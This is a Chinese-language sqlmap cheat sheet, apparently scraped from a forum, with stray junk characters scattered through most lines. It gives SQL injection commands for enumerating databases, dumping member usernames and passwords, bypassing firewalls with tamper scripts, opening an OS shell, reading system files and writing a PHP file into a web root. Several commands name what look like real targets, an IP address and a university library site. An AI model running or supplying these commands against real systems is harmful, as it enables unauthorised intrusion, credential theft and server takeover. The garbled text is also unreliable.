sqlmap使用实例

admin

/pentest/database/sqlmap

' ]* V2 g" W# ]1 v" C6 Dupdate :::::>     in the folder   after  execute    following   order : svn update
6 r- V4 U8 x4 C. N0 ]$ n
sqlmap.py -r 1.txt --current-db
) \. o# Z% \6 t, Q. q' }
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
7 H  x! ?- T& l( f$ L
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
, D( Q" M1 Z+ H( x6 i: h& z猜解数据库
5 b. P; f. z) H( a./sqlmap.py -u "injection-url" --dbs
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
% y+ _0 f- d( |& U" ?/ I5 h8 W
猜解表名
/ H8 f3 {" y' a& h% x7 _./sqlmap.py -u "injection-url" -D database_name --tables

sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
# ?. E5 X: ?3 \' i0 y1 xsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
( L: \. f& x, z; }: O2 E
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
' H$ E4 a$ M* c! Y4 C/ {
6 `$ E3 R$ `: L, Z7 [4 C& w6 msqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
# L4 ^$ P; `6 X# }; @7 x8 Vsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"

sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
8 D0 A1 y4 d* R9 {9 F4 gsqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
+ |2 m& c; Q) s$ y0 y1 `" Y% Fsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
4 k3 g: _2 {6 _( l. {, j. p
% c/ N. n- Z: }) u  nsqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
2 C0 B3 _8 R8 S) _: F! g2 P./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

3 F8 F# |3 t1 F9 [sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
3 ]1 k9 h3 o; `" |' e+ ?2 W* u7 h3 Ysqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
5 A: S3 X& a2 e1 `* j. p# a
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
&submit=Go
1 x+ ~( g6 k3 {4 Y猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
+ {8 N9 j  z3 r4 `! [0 M/ K+ B========================================================
& e- t5 F2 z  \+ q* n- H( z6 s) F搜索表名中包括mana字符的
; z# g6 Z4 P) ]. x' o/sqlmap.py -u "injection-url" -T mana --search
返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
  S% ]9 F1 y, `$ f6 s' Q/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
+ X4 \9 [! E) D+ i2 J3 E- a查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
本地文件 写入 远程目标绝对路径
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

. x3 s* p6 p% ^7 `/ d6 t- E* P* Hsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 L- }. t4 K! B  U! M3 N  K) e查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
8 F/ K5 `' r0 x1 f读取所有数据库用户或指定数据库用户的密码
2 s/ W' W" Y! b0 g$ ?2 asqlmap.py -r 1.txt --users --passwords
, Y( M/ u! t  z: C' O5 V/ o9 g; c& }sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
# Q5 s4 O3 I; p' g9 _. L+ |6 h9 @
/sqlmap.py -u "injection-url" --passwords -U root
/ T6 v2 N, \6 G* S) p
9 q" V, @5 B5 V& q7 \9 J+ m( e--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

- {7 _6 e! s% ^0 E# K+ s从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns

$ F8 E6 i, n; ]* R+ P4 z执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
* C/ Y6 o6 a) i: ~0 R+ P
' V$ d$ k- @* u; e6 e6 R